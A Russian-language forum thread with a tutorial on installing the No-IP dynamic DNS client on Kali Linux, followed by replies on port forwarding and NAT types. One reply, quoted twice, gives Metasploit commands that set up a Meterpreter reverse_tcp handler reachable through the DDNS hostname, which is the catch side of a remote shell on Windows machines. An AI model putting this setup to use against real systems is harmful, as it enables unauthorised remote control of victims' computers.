No-IP, или что делать если ip не белый

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Всем привет, часто в ветке форума встречаю, что делать если у меня нет белого ip? Один из вариантов это использовать сервис no-ip.Сейчас я постараюсь подробно рассказать как можно его установить в среде всеми нами любимого kali, и так поехали!!
Самое первое это заходим по адресу проходим регистрацию.
далее на этом же сайте скачиваем клиент.



Снимок экрана от 2016-11-16 21-16-22.png





после того как скачали,копируем в удобное место, распаковываем, и переходим в директорию с распакованным пакетом.


Снимок экрана от 2016-11-16 21-24-04.jpg




Далее командой make install запускаем установку данного пакета.

в процессе указываем свой почтовый ящик,который вводили при регистрации no-ip.
пароль,а также выбираем интервал обновления,я выбрал 5 минут. по умолчанию 30.
Так же у нас спросят Do you wish to run something at successful update?[N] (y/N) - Нажмите "y" чтобы обновить хост сейчас.


Снимок экрана от 2016-11-16 21-26-37.jpg


Запускается no-ip командой командой no-ip2


Снимок экрана от 2016-11-16 21-27-39.png



Вот и все, как видите ничего сложно.всем спасибо за внимания и удачи.
 
M

MAdDog719

Обязательно попробую. Спасибо
 
M

m0tion

Можно устанавливать не обязательно на Linux. Я например на роутере(Mikrotik) скрипт поставил.
 
  • Нравится
Реакции: Konstantin и Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Наконец-то, кто то это описал)) Все никак руки не доходили. Спасибо за статью.
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Может стоит изменить название на "что делать если ip динамический". В случае серых адресов No-Ip не поможет.
Вы уверены в своем утверждении? Как раз в этом примере что я показывал, no-ip стоит на машине с адресом 192.168.... после NAT, адрес самого роутера в сети 10.10....(что и есть серый). Все прекрасно работает!:)
 
Последнее редактирование:
  • Нравится
Реакции: id2746
M

MAdDog719

Что такое не везет
3b7a846a1db4.jpg

И как с этим бороться?
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
возможно с паролем или логином ошиблись
 
M

MAdDog719

возможно, вечером буду дома попробую еще раз.
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dns имя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд
Код:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j
2016_11_17_162410_1023x579_scrot.jpg
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dns имя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд
Код:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j
2016_11_17_162410_1023x579_scrot.jpg
И не забыть пробросить нужные порты в роутере .
 
M

m0tion

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dns имя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд
Код:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j
2016_11_17_162410_1023x579_scrot.jpg
У меня всё проще. Достаточно указать LHOST = IP машины с msf и пробросить порты в роутере
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
у вас белый статический ip, у многих такое отсутствует...
 
Последнее редактирование:
D

DoberGroup

Вы уверены в своем утверждении? Как раз в этом примере что я показывал, no-ip стоит на машине с адресом 192.168.... после NAT, адрес самого роутера в сети 10.10....(что и есть серый). Все прекрасно работает!:)

А как Вы через провайдерский NAT, простите, порты пробрасываете? DDNS это ведь не самоцель, это вспомогательный инструмет
 
D

DoberGroup

Я пробрасываю порты только на своем роутере.
А смысл?
Вы пишете, что внешний адрес у Вас 10.х.х.х, не маршрутизируемый
Значит - Вы за провайдерским NAT (кстати, каким? Конусным, симметричным, порт-/адрес-определяемым?)
Что Вам даст проброс портов на роутере, их все равно из внешнего мира не будет видно?
 
  • Нравится
Реакции: Dr.Jo.Frink

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
я не смотрел топологию провайдера..хотя интерес вы подогрели,нужно на досуге глянуть.
 
I

Ishikawa

Немного теории

Cone NAT

Внутренний адрес (192.168.0.2:2210) проецируются на внешний адрес (1.1.1.2:8801). Любой пакет посланный с 192.168.0.2:2210 будет послан через 1.1.1.2:8801. Любой пакет с внешнего хоста, посланный на адрес 1.1.1.2:8801 будет отправлен на 192.168.0.2:2210

nattypescone.png

Full cone nat

Address-Restricted cone NAT или Restricted cone NAT.
Внутренний адрес (192.168.0.2:2210) проецируются на внешний адрес (1.1.1.2:8801). Любой пакет посланный с 192.168.0.2:2210 будет послан через 1.1.1.2:8801. Пакет с любого порта внешнего хоста, посланный на адрес 1.1.1.2:8801 будет отправлен на 192.168.0.2:2210 только в случае, если 192.168.0.2:2210 предварительно посылал пакет на этот внешний хост.

nattypesrestrictedcone.png


Port-Restricted cone NAT
Внутренний адрес (192.168.0.2:2210) проецируются на внешний адрес (1.1.1.2:8801). Любой пакет посланный с 192.168.0.2:2210 будет послан через 1.1.1.2:8801. Внешний хост (1.1.1.30:1234) может послать пакет на 192.168.0.2:2210 через 1.1.1.2:8801 только в случае если ранее 192.168.0.2:2210 слал пакет на 1.1.1.30:1234

nattypesportrestrictedcone.png


Symmetric NAT
Каждый пакет с определенного внутреннего IP адреса:порта на определенный внешний IP адрес:порт будет иметь после трансляции уникальный внешний адрес порт. Соответственно, пакет с одного и того-же внутреннего адреса:порта, но посланный на другой внешний хост или порт после трансляции будет иметь другой внешний адрес-порт. Внешние хосты могут послать обратный пакет только на те хосты:порты откуда они получили пакеты.

nattypessymmetric.png
 
  • Нравится
Реакции: Dr.Jo.Frink и id2746
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!